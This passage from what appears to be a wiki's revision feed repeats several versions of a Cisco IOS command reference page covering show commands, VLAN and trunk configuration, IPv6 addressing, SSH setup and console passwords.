 enable&lt;br /&gt;
&lt;br /&gt;
Add an encrypted password for the enable command&lt;br /&gt;
 enable secret ThisisaSecret&lt;br /&gt;
&lt;br /&gt;
Enter global configuration mode (You can use the &amp;lt;code&amp;gt;do&amp;lt;/code&amp;gt; prefix to run regular commands from the config mode if you don&#039;t feel like running &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; first)&lt;br /&gt;
 configure terminal&lt;br /&gt;
&lt;br /&gt;
Show startup config (the one stored in nvram for next boot)&lt;br /&gt;
 show startup-config&lt;br /&gt;
&lt;br /&gt;
Show running config (the one stored in ram and is currently in use)&lt;br /&gt;
 show running-config&lt;br /&gt;
&lt;br /&gt;
Show a specific interface&#039;s config in the running configuration. &lt;br /&gt;
 show run interface g0/0&lt;br /&gt;
&lt;br /&gt;
Filter through the running config (similar to grep on linux)&lt;br /&gt;
 show run | include {searchterm}&lt;br /&gt;
 show run | begin {searchterm}&lt;br /&gt;
 show run | section {section-name}&lt;br /&gt;
&lt;br /&gt;
Copy the in-use config to the startup config so that it will be used on the next boot. There are two ways to shorten it below&lt;br /&gt;
 copy running-config startup-config&lt;br /&gt;
 copy run start&lt;br /&gt;
 wr&lt;br /&gt;
&lt;br /&gt;
Apply weak encryption to all unencrypted passwords. This only changes what is displayed in the config file, any password typed through a network cable is still transmitted in plain text.&lt;br /&gt;
 service password-encryption&lt;br /&gt;
&lt;br /&gt;
Show IPv4 IP Address assigned to each interface&lt;br /&gt;
 show ip interface brief &lt;br /&gt;
&lt;br /&gt;
Show IPv6 IP Address assigned to each interface&lt;br /&gt;
 show ipv6 interface brief &lt;br /&gt;
&lt;br /&gt;
Show all routes&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
Show vlans and interfaces assigned to them&lt;br /&gt;
 show vlan brief&lt;br /&gt;
&lt;br /&gt;
Show VLAN and related information about an interface&lt;br /&gt;
 show interface g0/1 switchport&lt;br /&gt;
&lt;br /&gt;
Show trunk interfaces&lt;br /&gt;
 show int trunk&lt;br /&gt;
&lt;br /&gt;
Clear mac address table (switches only)&lt;br /&gt;
 clear mac address-table&lt;br /&gt;
&lt;br /&gt;
Clear arp cache&lt;br /&gt;
 clear arp-cache&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Telnet/Remote Access Commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Remote into a connected device using telnet&lt;br /&gt;
 connect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Show a list of hosts to connect to&lt;br /&gt;
 show hosts&lt;br /&gt;
&lt;br /&gt;
Show all connected telnet sessions&lt;br /&gt;
 show sessions&lt;br /&gt;
&lt;br /&gt;
Disconnect a telnet session&lt;br /&gt;
 disconnect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Suspend the active telnet connection (Keyboard Shortcut)&lt;br /&gt;
 Ctrl+Shift+6 -&amp;gt; x&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Global configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Disable default behavior of looking up unknown names/commands in DNS&lt;br /&gt;
 no ip domain-lookup&lt;br /&gt;
&lt;br /&gt;
Set a banner message&lt;br /&gt;
 banner motd MESSAGEHERE&lt;br /&gt;
&lt;br /&gt;
Change the machine&#039;s hostname (does not require a reboot)&lt;br /&gt;
 hostname&lt;br /&gt;
&lt;br /&gt;
Configure the console port (0)&lt;br /&gt;
 line con 0&lt;br /&gt;
&lt;br /&gt;
Configure vty interfaces 0 through 15&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;vlan 1&amp;quot;&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;fa0/1&amp;quot;&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
&lt;br /&gt;
Configure the range of interfaces fa0/2 to fa0/3&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
&lt;br /&gt;
Enter vlan configuration mode&lt;br /&gt;
 vlan 1&lt;br /&gt;
&lt;br /&gt;
====Vlan Configuration Commands====&lt;br /&gt;
Set vlan name&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&lt;br /&gt;
====Console or VTY line configuration commands====&lt;br /&gt;
Add a password to console port access&lt;br /&gt;
 password itsasecret&lt;br /&gt;
&lt;br /&gt;
Force users to enter the password to login&lt;br /&gt;
 login&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Interface configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the interface to a specific vlan (Alt)&lt;br /&gt;
 encapsulation dot1q 10&lt;br /&gt;
&lt;br /&gt;
Set the interface to a specific vlan&lt;br /&gt;
 switchport mode access ! disable trunking, default is switchport mode auto&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
Set an interface to trunk mode&lt;br /&gt;
 switchport trunk encapsulation dot1q ! switches off the legacy cisco trunking protocol, not needed on newer switches&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
Change allowed vlans on trunk interface&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
Set native vlan on a trunk interface&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
Set an IPv4 address on the interface&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Change interface state to &amp;quot;up&amp;quot;&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Ipv6 Interface Commands=====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set an IPv6 address on the interface&lt;br /&gt;
 ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Set a link-local address on the interface&lt;br /&gt;
  ipv6 addr fe80::1 link-local&lt;br /&gt;
&lt;br /&gt;
Remove an IPv6 address on the interface&lt;br /&gt;
 no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Remove all IPv6 addresses on the interface&lt;br /&gt;
 no ipv6 address&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1037</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1037"/>
		<updated>2026-01-14T21:26:45Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Configure SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;hr&amp;gt;&lt;br /&gt;
====Commands for cisco IOS devices (switches, routers, etc)====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Enable ipv4 routing====&lt;br /&gt;
This needs to be manually done sometimes on layer 3 switches&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
====Enable ipv6 routing====&lt;br /&gt;
This needs to be done on routers to enable ipv6 functionality&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Show the entire mac address table (Lets you figure out what device is plugged into each switch port)&lt;br /&gt;
 show mac address-table&lt;br /&gt;
&lt;br /&gt;
Show OS and Device versions&lt;br /&gt;
 show version&lt;br /&gt;
&lt;br /&gt;
Show logged in users&lt;br /&gt;
 show users&lt;br /&gt;
&lt;br /&gt;
List files in current directory&lt;br /&gt;
 dir&lt;br /&gt;
&lt;br /&gt;
List files in nvram&lt;br /&gt;
 dir nvram:&lt;br /&gt;
&lt;br /&gt;
Copy command destinatons (we use running-config as an example source file)&lt;br /&gt;
 copy running-config [[cisco copy destinations]]&lt;br /&gt;
&lt;br /&gt;
Elevate to root user&lt;br /&gt;
 enable&lt;br /&gt;
&lt;br /&gt;
Add an encrypted password for the enable command&lt;br /&gt;
 enable secret ThisisaSecret&lt;br /&gt;
&lt;br /&gt;
Enter global configuration mode (You can use the &amp;lt;code&amp;gt;do&amp;lt;/code&amp;gt; prefix to run regular commands from the config mode if you don&#039;t feel like running &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; first)&lt;br /&gt;
 configure terminal&lt;br /&gt;
&lt;br /&gt;
Show startup config (the one stored in nvram for next boot)&lt;br /&gt;
 show startup-config&lt;br /&gt;
&lt;br /&gt;
Show running config (the one stored in ram and is currently in use)&lt;br /&gt;
 show running-config&lt;br /&gt;
&lt;br /&gt;
Show a specific interface&#039;s config in the running configuration. &lt;br /&gt;
 show run interface g0/0&lt;br /&gt;
&lt;br /&gt;
Filter through the running config (similar to grep on linux)&lt;br /&gt;
 show run | include {searchterm}&lt;br /&gt;
 show run | begin {searchterm}&lt;br /&gt;
 show run | section {section-name}&lt;br /&gt;
&lt;br /&gt;
Copy the in-use config to the startup config so that it will be used on the next boot. There are two ways to shorten it below&lt;br /&gt;
 copy running-config startup-config&lt;br /&gt;
 copy run start&lt;br /&gt;
 wr&lt;br /&gt;
&lt;br /&gt;
Apply weak encryption to all unencrypted passwords. This only changes what is displayed in the config file, any password typed through a network cable is still transmitted in plain text.&lt;br /&gt;
 service password-encryption&lt;br /&gt;
&lt;br /&gt;
Show IPv4 IP Address assigned to each interface&lt;br /&gt;
 show ip interface brief &lt;br /&gt;
&lt;br /&gt;
Show IPv6 IP Address assigned to each interface&lt;br /&gt;
 show ipv6 interface brief &lt;br /&gt;
&lt;br /&gt;
Show all routes&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
Show vlans and interfaces assigned to them&lt;br /&gt;
 show vlan brief&lt;br /&gt;
&lt;br /&gt;
Show VLAN and related information about an interface&lt;br /&gt;
 show interface g0/1 switchport&lt;br /&gt;
&lt;br /&gt;
Show trunk interfaces&lt;br /&gt;
 show int trunk&lt;br /&gt;
&lt;br /&gt;
Clear mac address table (switches only)&lt;br /&gt;
 clear mac address-table&lt;br /&gt;
&lt;br /&gt;
Clear arp cache&lt;br /&gt;
 clear arp-cache&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Telnet/Remote Access Commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Remote into a connected device using telnet&lt;br /&gt;
 connect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Show a list of hosts to connect to&lt;br /&gt;
 show hosts&lt;br /&gt;
&lt;br /&gt;
Show all connected telnet sessions&lt;br /&gt;
 show sessions&lt;br /&gt;
&lt;br /&gt;
Disconnect a telnet session&lt;br /&gt;
 disconnect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Suspend the active telnet connection (Keyboard Shortcut)&lt;br /&gt;
 Ctrl+Shift+6 -&amp;gt; x&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Global configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Disable default behavior of looking up unknown names/commands in DNS&lt;br /&gt;
 no ip domain-lookup&lt;br /&gt;
&lt;br /&gt;
Set a banner message&lt;br /&gt;
 banner motd MESSAGEHERE&lt;br /&gt;
&lt;br /&gt;
=====Configure SSH=====&lt;br /&gt;
Set the domain name&lt;br /&gt;
 ip domain-name cisco.com&lt;br /&gt;
&lt;br /&gt;
Generate rsa keypair&lt;br /&gt;
 crypto key generate rsa&lt;br /&gt;
&lt;br /&gt;
Delete rsa keypair&lt;br /&gt;
  crypto key zeroize rsa&lt;br /&gt;
&lt;br /&gt;
Make a user account&lt;br /&gt;
 username admin secret ccna&lt;br /&gt;
&lt;br /&gt;
Assign a default gateway&lt;br /&gt;
 ip default-gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
Enable ssh on the VTY lines&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Enable SSH v2&lt;br /&gt;
 ip ssh version 2&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Change the machine&#039;s hostname (does not require a reboot)&lt;br /&gt;
 hostname&lt;br /&gt;
&lt;br /&gt;
Configure the console port (0)&lt;br /&gt;
 line con 0&lt;br /&gt;
&lt;br /&gt;
Configure vty interfaces 0 through 15&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;vlan 1&amp;quot;&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;fa0/1&amp;quot;&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
&lt;br /&gt;
Configure the range of interfaces fa0/2 to fa0/3&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
&lt;br /&gt;
Enter vlan configuration mode&lt;br /&gt;
 vlan 1&lt;br /&gt;
&lt;br /&gt;
====Vlan Configuration Commands====&lt;br /&gt;
Set vlan name&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&lt;br /&gt;
====Console or VTY line configuration commands====&lt;br /&gt;
Add a password to console port access&lt;br /&gt;
 password itsasecret&lt;br /&gt;
&lt;br /&gt;
Force users to enter the password to login&lt;br /&gt;
 login&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Interface configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the interface to a specific vlan (Alt)&lt;br /&gt;
 encapsulation dot1q 10&lt;br /&gt;
&lt;br /&gt;
Set the interface to a specific vlan&lt;br /&gt;
 switchport mode access ! disable trunking, default is switchport mode auto&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
Set an interface to trunk mode&lt;br /&gt;
 switchport trunk encapsulation dot1q ! switches off the legacy cisco trunking protocol, not needed on newer switches&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
Change allowed vlans on trunk interface&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
Set native vlan on a trunk interface&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
Set an IPv4 address on the interface&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Change interface state to &amp;quot;up&amp;quot;&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Ipv6 Interface Commands=====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set an IPv6 address on the interface&lt;br /&gt;
 ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Set a link-local address on the interface&lt;br /&gt;
  ipv6 addr fe80::1 link-local&lt;br /&gt;
&lt;br /&gt;
Remove an IPv6 address on the interface&lt;br /&gt;
 no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Remove all IPv6 addresses on the interface&lt;br /&gt;
 no ipv6 address&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1036</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1036"/>
		<updated>2026-01-14T21:24:02Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Global configuration commands */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;hr&amp;gt;&lt;br /&gt;
====Commands for cisco IOS devices (switches, routers, etc)====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Enable ipv4 routing====&lt;br /&gt;
This needs to be manually done sometimes on layer 3 switches&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
====Enable ipv6 routing====&lt;br /&gt;
This needs to be done on routers to enable ipv6 functionality&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Show the entire mac address table (Lets you figure out what device is plugged into each switch port)&lt;br /&gt;
 show mac address-table&lt;br /&gt;
&lt;br /&gt;
Show OS and Device versions&lt;br /&gt;
 show version&lt;br /&gt;
&lt;br /&gt;
Show logged in users&lt;br /&gt;
 show users&lt;br /&gt;
&lt;br /&gt;
List files in current directory&lt;br /&gt;
 dir&lt;br /&gt;
&lt;br /&gt;
List files in nvram&lt;br /&gt;
 dir nvram:&lt;br /&gt;
&lt;br /&gt;
Copy command destinatons (we use running-config as an example source file)&lt;br /&gt;
 copy running-config [[cisco copy destinations]]&lt;br /&gt;
&lt;br /&gt;
Elevate to root user&lt;br /&gt;
 enable&lt;br /&gt;
&lt;br /&gt;
Add an encrypted password for the enable command&lt;br /&gt;
 enable secret ThisisaSecret&lt;br /&gt;
&lt;br /&gt;
Enter global configuration mode (You can use the &amp;lt;code&amp;gt;do&amp;lt;/code&amp;gt; prefix to run regular commands from the config mode if you don&#039;t feel like running &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; first)&lt;br /&gt;
 configure terminal&lt;br /&gt;
&lt;br /&gt;
Show startup config (the one stored in nvram for next boot)&lt;br /&gt;
 show startup-config&lt;br /&gt;
&lt;br /&gt;
Show running config (the one stored in ram and is currently in use)&lt;br /&gt;
 show running-config&lt;br /&gt;
&lt;br /&gt;
Show a specific interface&#039;s config in the running configuration. &lt;br /&gt;
 show run interface g0/0&lt;br /&gt;
&lt;br /&gt;
Filter through the running config (similar to grep on linux)&lt;br /&gt;
 show run | include {searchterm}&lt;br /&gt;
 show run | begin {searchterm}&lt;br /&gt;
 show run | section {section-name}&lt;br /&gt;
&lt;br /&gt;
Copy the in-use config to the startup config so that it will be used on the next boot. There are two ways to shorten it below&lt;br /&gt;
 copy running-config startup-config&lt;br /&gt;
 copy run start&lt;br /&gt;
 wr&lt;br /&gt;
&lt;br /&gt;
Apply weak encryption to all unencrypted passwords. This only changes what is displayed in the config file, any password typed through a network cable is still transmitted in plain text.&lt;br /&gt;
 service password-encryption&lt;br /&gt;
&lt;br /&gt;
Show IPv4 IP Address assigned to each interface&lt;br /&gt;
 show ip interface brief &lt;br /&gt;
&lt;br /&gt;
Show IPv6 IP Address assigned to each interface&lt;br /&gt;
 show ipv6 interface brief &lt;br /&gt;
&lt;br /&gt;
Show all routes&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
Show vlans and interfaces assigned to them&lt;br /&gt;
 show vlan brief&lt;br /&gt;
&lt;br /&gt;
Show VLAN and related information about an interface&lt;br /&gt;
 show interface g0/1 switchport&lt;br /&gt;
&lt;br /&gt;
Show trunk interfaces&lt;br /&gt;
 show int trunk&lt;br /&gt;
&lt;br /&gt;
Clear mac address table (switches only)&lt;br /&gt;
 clear mac address-table&lt;br /&gt;
&lt;br /&gt;
Clear arp cache&lt;br /&gt;
 clear arp-cache&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Telnet/Remote Access Commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Remote into a connected device using telnet&lt;br /&gt;
 connect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Show a list of hosts to connect to&lt;br /&gt;
 show hosts&lt;br /&gt;
&lt;br /&gt;
Show all connected telnet sessions&lt;br /&gt;
 show sessions&lt;br /&gt;
&lt;br /&gt;
Disconnect a telnet session&lt;br /&gt;
 disconnect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Suspend the active telnet connection (Keyboard Shortcut)&lt;br /&gt;
 Ctrl+Shift+6 -&amp;gt; x&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Global configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Disable default behavior of looking up unknown names/commands in DNS&lt;br /&gt;
 no ip domain-lookup&lt;br /&gt;
&lt;br /&gt;
Set a banner message&lt;br /&gt;
 banner motd MESSAGEHERE&lt;br /&gt;
&lt;br /&gt;
=====Configure SSH=====&lt;br /&gt;
Set the domain name&lt;br /&gt;
 ip domain-name cisco.com&lt;br /&gt;
&lt;br /&gt;
Generate rsa keypair&lt;br /&gt;
 crypto key generate rsa&lt;br /&gt;
&lt;br /&gt;
Delete rsa keypair&lt;br /&gt;
  crypto key zeroize rsa&lt;br /&gt;
&lt;br /&gt;
Make a user account&lt;br /&gt;
 username admin secret ccna&lt;br /&gt;
&lt;br /&gt;
Assign a default gateway&lt;br /&gt;
 ip default-gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
Change the machine&#039;s hostname (does not require a reboot)&lt;br /&gt;
 hostname&lt;br /&gt;
&lt;br /&gt;
Configure the console port (0)&lt;br /&gt;
 line con 0&lt;br /&gt;
&lt;br /&gt;
Configure vty interfaces 0 through 15&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;vlan 1&amp;quot;&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
&lt;br /&gt;
Configure the interface &amp;quot;fa0/1&amp;quot;&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
&lt;br /&gt;
Configure the range of interfaces fa0/2 to fa0/3&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
&lt;br /&gt;
Enter vlan configuration mode&lt;br /&gt;
 vlan 1&lt;br /&gt;
&lt;br /&gt;
====Vlan Configuration Commands====&lt;br /&gt;
Set vlan name&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&lt;br /&gt;
====Console or VTY line configuration commands====&lt;br /&gt;
Add a password to console port access&lt;br /&gt;
 password itsasecret&lt;br /&gt;
&lt;br /&gt;
Force users to enter the password to login&lt;br /&gt;
 login&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Interface configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set the interface to a specific vlan (Alt)&lt;br /&gt;
 encapsulation dot1q 10&lt;br /&gt;
&lt;br /&gt;
Set the interface to a specific vlan&lt;br /&gt;
 switchport mode access ! disable trunking, default is switchport mode auto&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
Set an interface to trunk mode&lt;br /&gt;
 switchport trunk encapsulation dot1q ! switches off the legacy cisco trunking protocol, not needed on newer switches&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
Change allowed vlans on trunk interface&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
Set native vlan on a trunk interface&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
Set an IPv4 address on the interface&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
Change interface state to &amp;quot;up&amp;quot;&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Ipv6 Interface Commands=====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Set an IPv6 address on the interface&lt;br /&gt;
 ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Set a link-local address on the interface&lt;br /&gt;
  ipv6 addr fe80::1 link-local&lt;br /&gt;
&lt;br /&gt;
Remove an IPv6 address on the interface&lt;br /&gt;
 no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&lt;br /&gt;
Remove all IPv6 addresses on the interface&lt;br /&gt;
 no ipv6 address&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1035</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1035"/>
		<updated>2026-01-14T20:40:22Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Global configuration commands */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;hr&amp;gt;&lt;br /&gt;
====Commands for cisco IOS devices (switches, routers, etc)====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Enable ipv4 routing====&lt;br /&gt;
This needs to be manually done sometimes on layer 3 switches&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
====Enable ipv6 routing====&lt;br /&gt;
This needs to be done on routers to enable ipv6 functionality&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Show the entire mac address table (Lets you figure out what device is plugged into each switch port)&lt;br /&gt;
 show mac address-table&lt;br /&gt;
&lt;br /&gt;
Show OS and Device versions&lt;br /&gt;
 show version&lt;br /&gt;
&lt;br /&gt;
Show logged in users&lt;br /&gt;
 show users&lt;br /&gt;
&lt;br /&gt;
List files in current directory&lt;br /&gt;
 dir&lt;br /&gt;
&lt;br /&gt;
List files in nvram&lt;br /&gt;
 dir nvram:&lt;br /&gt;
&lt;br /&gt;
Copy command destinatons (we use running-config as an example source file)&lt;br /&gt;
 copy running-config [[cisco copy destinations]]&lt;br /&gt;
&lt;br /&gt;
Elevate to root user&lt;br /&gt;
 enable&lt;br /&gt;
&lt;br /&gt;
Add an encrypted password for the enable command&lt;br /&gt;
 enable secret ThisisaSecret&lt;br /&gt;
&lt;br /&gt;
Enter global configuration mode (You can use the &amp;lt;code&amp;gt;do&amp;lt;/code&amp;gt; prefix to run regular commands from the config mode if you don&#039;t feel like running &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; first)&lt;br /&gt;
 configure terminal&lt;br /&gt;
&lt;br /&gt;
Show startup config (the one stored in nvram for next boot)&lt;br /&gt;
 show startup-config&lt;br /&gt;
&lt;br /&gt;
Show running config (the one stored in ram and is currently in use)&lt;br /&gt;
 show running-config&lt;br /&gt;
&lt;br /&gt;
Show a specific interface&#039;s config in the running configuration. &lt;br /&gt;
 show run interface g0/0&lt;br /&gt;
&lt;br /&gt;
Filter through the running config (similar to grep on linux)&lt;br /&gt;
 show run | include {searchterm}&lt;br /&gt;
 show run | begin {searchterm}&lt;br /&gt;
 show run | section {section-name}&lt;br /&gt;
&lt;br /&gt;
Copy the in-use config to the startup config so that it will be used on the next boot. There are two ways to shorten it below&lt;br /&gt;
 copy running-config startup-config&lt;br /&gt;
 copy run start&lt;br /&gt;
 wr&lt;br /&gt;
&lt;br /&gt;
Apply weak encryption to all unencrypted passwords. This only changes what is displayed in the config file, any password typed through a network cable is still transmitted in plain text.&lt;br /&gt;
 service password-encryption&lt;br /&gt;
&lt;br /&gt;
Show IPv4 IP Address assigned to each interface&lt;br /&gt;
 show ip interface brief &lt;br /&gt;
&lt;br /&gt;
Show IPv6 IP Address assigned to each interface&lt;br /&gt;
 show ipv6 interface brief &lt;br /&gt;
&lt;br /&gt;
Show all routes&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
Show vlans and interfaces assigned to them&lt;br /&gt;
 show vlan brief&lt;br /&gt;
&lt;br /&gt;
Show VLAN and related information about an interface&lt;br /&gt;
 show interface g0/1 switchport&lt;br /&gt;
&lt;br /&gt;
Show trunk interfaces&lt;br /&gt;
 show int trunk&lt;br /&gt;
&lt;br /&gt;
Clear mac address table (switches only)&lt;br /&gt;
 clear mac address-table&lt;br /&gt;
&lt;br /&gt;
Clear arp cache&lt;br /&gt;
 clear arp-cache&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Telnet/Remote Access Commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Remote into a connected device using telnet&lt;br /&gt;
 connect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Show a list of hosts to connect to&lt;br /&gt;
 show hosts&lt;br /&gt;
&lt;br /&gt;
Show all connected telnet sessions&lt;br /&gt;
 show sessions&lt;br /&gt;
&lt;br /&gt;
Disconnect a telnet session&lt;br /&gt;
 disconnect {Device Name}&lt;br /&gt;
&lt;br /&gt;
Suspend the active telnet connection (Keyboard Shortcut)&lt;br /&gt;
 Ctrl+Shift+6 -&amp;gt; x&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
====Global configuration commands====&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Disable default behavior of looking up unknown names/commands in DNS&lt;br /&gt;
 no ip domain-lookup&lt;br /&gt;
&lt;br /&gt;
Set a banner message&lt;br /&gt;
 banner motd MESSAGEHERE&lt;br /&gt;
&lt;br /&gt;
Set the domain name&lt;br /&gt;
 ip domain-name cisco.com&lt;br /&gt;
&lt;br /&gt;
Assign a default gateway&lt;br /&gt;
 ip default-gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
Change the machine&#039;s hostname (does not require a reboot)&lt;br /&gt;
 hostname&lt;br /&gt;
&lt;br /&gt;
Configure the console port (0)&lt;br /&gt;
 line con 0&lt;br /&gt;
&lt;br /&gt;
Configure vty interfaces 0 through 15&lt;br /&gt;
 line vty 0 15&lt;br /&gt;
&lt;br /&gt;
